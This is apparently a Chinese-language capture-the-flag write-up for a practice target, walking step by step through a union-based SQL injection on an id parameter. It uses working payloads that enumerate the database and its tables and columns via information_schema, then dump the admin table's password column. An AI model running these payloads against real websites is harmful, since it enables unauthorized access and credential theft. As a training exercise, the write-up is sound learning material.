【蓝胖】靶场第一章小芳的writeup

这个猫好可爱啊~  以后我也养一只

天才第一步，判断有没有注入，如下图，加个  ’ 报错

1 and 1=1 正确

猜表长度，最后猜到2正确 order by 

把id设为2，前面出错，猜数据库名 id=2 union select 1,database()   

爆出数据库中所有的表：

/?id=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() 

爆出当前表：id=2 union select 1,table_name from information_schema.tables where table_schema = database() 

这时候有了表名，库名，再去爆出所有列，(*^▽^*)

2 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'admin' 

嘿嘿，有3列，看password列吧

?id=2 union select 2,password from admin 

得到一串神秘的英文单词，居然不是肥猫的名字，算了，去试试是不是秘钥吧！

大家有什么其他方法，欢迎留言讨论~~